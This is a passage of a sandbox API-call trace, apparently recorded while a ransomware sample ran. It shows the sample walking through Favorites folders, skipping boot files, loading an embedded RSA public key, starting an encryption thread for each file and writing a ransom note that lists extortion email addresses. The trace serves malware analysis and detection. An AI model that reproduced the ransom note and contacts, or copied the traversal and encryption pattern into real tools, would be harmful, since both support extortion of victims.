[0203.461] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch="NTDETECT.COM") returned 0x0 [0203.461] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch="ntdetect.com") returned 0x0 [0203.461] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\") returned 37 [0203.461] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\") [0203.461] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0203.461] lstrcpyW (in: lpString1=0x17be7c, lpString2="Web Slice Gallery.url" | out: lpString1="Web Slice Gallery.url") returned="Web Slice Gallery.url" [0203.461] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\" [0203.461] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe5c [0203.462] Sleep (dwMilliseconds=0x96) [0203.616] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0203.617] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0203.617] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0203.617] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites\\Links" | out: lpString1="C:\\Users\\Default\\Favorites\\Links") returned="C:\\Users\\Default\\Favorites\\Links" [0203.617] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Links", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\Links\\*.*") returned="C:\\Users\\Default\\Favorites\\Links\\*.*" [0203.617] SetErrorMode (uMode=0x1) returned 0x1 [0203.617] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Favorites\\Links\\_HELP_INSTRUCTION.TXT") returned 54 [0203.617] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0203.618] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0203.618] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xe60) returned 0x0 [0203.618] RegQueryValueExW (in: hKey=0xe60, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43babc0, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43babc0*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0203.618] RegCloseKey (hKey=0xe60) returned 0x0 [0203.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0203.618] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0203.618] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\links\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0203.618] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\links\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0203.618] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Links\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0203.619] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites\\Links") returned="Links" [0203.619] lstrcpyW (in: lpString1=0x17b644, lpString2="Links" | out: lpString1="Links") returned="Links" [0203.619] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Default\\Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0203.619] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\") returned="C:\\Users\\Default\\Favorites\\" [0203.619] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="Microsoft Websites" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites" [0203.619] SetErrorMode (uMode=0x1) returned 0x1 [0203.619] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites\\Microsoft Websites" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites" [0203.619] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0203.619] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0203.619] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*" [0203.619] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0203.620] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites\\Microsoft Websites") returned="Microsoft Websites" [0203.620] lstrcpyW (in: lpString1=0x17b644, lpString2="Microsoft Websites" | out: lpString1="Microsoft Websites") returned="Microsoft Websites" [0203.620] StrStrW (lpFirst="IE Add-on site.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0203.620] StrStrW (lpFirst="IE Add-on site.url", lpSrch="ntldr") returned 0x0 [0203.620] StrStrW (lpFirst="IE Add-on site.url", lpSrch="NTLDR") returned 0x0 [0203.620] StrStrW (lpFirst="IE Add-on site.url", lpSrch="NTDETECT.COM") returned 0x0 [0203.620] StrStrW (lpFirst="IE Add-on site.url", lpSrch="ntdetect.com") returned 0x0 [0203.620] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned 50 [0203.620] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") [0203.621] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0203.621] lstrcpyW (in: lpString1=0x17be7c, lpString2="IE Add-on site.url" | out: lpString1="IE Add-on site.url") returned="IE Add-on site.url" [0203.621] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0203.621] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe68 [0203.621] Sleep (dwMilliseconds=0x96) [0203.773] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0203.773] lstrcmpW (lpString1="IE site on Microsoft.com.url", lpString2="..") returned 1 [0203.773] lstrcmpW (lpString1="IE site on Microsoft.com.url", lpString2=".") returned 1 [0203.773] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0203.773] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch="ntldr") returned 0x0 [0203.773] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch="NTLDR") returned 0x0 [0203.773] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch="NTDETECT.COM") returned 0x0 [0203.773] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch="ntdetect.com") returned 0x0 [0203.773] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned 50 [0203.773] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") [0203.773] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0203.773] lstrcpyW (in: lpString1=0x17be7c, lpString2="IE site on Microsoft.com.url" | out: lpString1="IE site on Microsoft.com.url") returned="IE site on Microsoft.com.url" [0203.773] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0203.773] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe6c [0203.774] Sleep (dwMilliseconds=0x96) [0203.928] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0203.928] lstrcmpW (lpString1="Microsoft At Home.url", lpString2="..") returned 1 [0203.928] lstrcmpW (lpString1="Microsoft At Home.url", lpString2=".") returned 1 [0203.929] StrStrW (lpFirst="Microsoft At Home.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0203.929] StrStrW (lpFirst="Microsoft At Home.url", lpSrch="ntldr") returned 0x0 [0203.929] StrStrW (lpFirst="Microsoft At Home.url", lpSrch="NTLDR") returned 0x0 [0203.929] StrStrW (lpFirst="Microsoft At Home.url", lpSrch="NTDETECT.COM") returned 0x0 [0203.929] StrStrW (lpFirst="Microsoft At Home.url", lpSrch="ntdetect.com") returned 0x0 [0203.929] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned 50 [0203.929] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") [0203.929] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0203.929] lstrcpyW (in: lpString1=0x17be7c, lpString2="Microsoft At Home.url" | out: lpString1="Microsoft At Home.url") returned="Microsoft At Home.url" [0203.929] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0203.929] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe70 [0203.929] Sleep (dwMilliseconds=0x96) [0204.088] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0204.088] lstrcmpW (lpString1="Microsoft At Work.url", lpString2="..") returned 1 [0204.088] lstrcmpW (lpString1="Microsoft At Work.url", lpString2=".") returned 1 [0204.088] StrStrW (lpFirst="Microsoft At Work.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0204.088] StrStrW (lpFirst="Microsoft At Work.url", lpSrch="ntldr") returned 0x0 [0204.088] StrStrW (lpFirst="Microsoft At Work.url", lpSrch="NTLDR") returned 0x0 [0204.088] StrStrW (lpFirst="Microsoft At Work.url", lpSrch="NTDETECT.COM") returned 0x0 [0204.088] StrStrW (lpFirst="Microsoft At Work.url", lpSrch="ntdetect.com") returned 0x0 [0204.089] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned 50 [0204.089] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") [0204.089] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0204.089] lstrcpyW (in: lpString1=0x17be7c, lpString2="Microsoft At Work.url" | out: lpString1="Microsoft At Work.url") returned="Microsoft At Work.url" [0204.089] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0204.089] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe74 [0204.089] Sleep (dwMilliseconds=0x96) [0204.240] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0204.240] lstrcmpW (lpString1="Microsoft Store.url", lpString2="..") returned 1 [0204.241] lstrcmpW (lpString1="Microsoft Store.url", lpString2=".") returned 1 [0204.241] StrStrW (lpFirst="Microsoft Store.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0204.241] StrStrW (lpFirst="Microsoft Store.url", lpSrch="ntldr") returned 0x0 [0204.241] StrStrW (lpFirst="Microsoft Store.url", lpSrch="NTLDR") returned 0x0 [0204.241] StrStrW (lpFirst="Microsoft Store.url", lpSrch="NTDETECT.COM") returned 0x0 [0204.241] StrStrW (lpFirst="Microsoft Store.url", lpSrch="ntdetect.com") returned 0x0 [0204.241] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned 50 [0204.241] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") [0204.241] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0204.241] lstrcpyW (in: lpString1=0x17be7c, lpString2="Microsoft Store.url" | out: lpString1="Microsoft Store.url") returned="Microsoft Store.url" [0204.241] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0204.241] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe78 [0204.242] Sleep (dwMilliseconds=0x96) [0204.396] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0204.397] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0204.397] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0204.397] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites\\Microsoft Websites" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites" [0204.397] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*.*" [0204.397] SetErrorMode (uMode=0x1) returned 0x1 [0204.397] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\_HELP_INSTRUCTION.TXT") returned 67 [0204.397] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0204.398] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0204.398] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xe7c) returned 0x0 [0204.398] RegQueryValueExW (in: hKey=0xe7c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43badf0, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43badf0*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0204.398] RegCloseKey (hKey=0xe7c) returned 0x0 [0204.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0204.398] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0204.398] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0204.399] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, 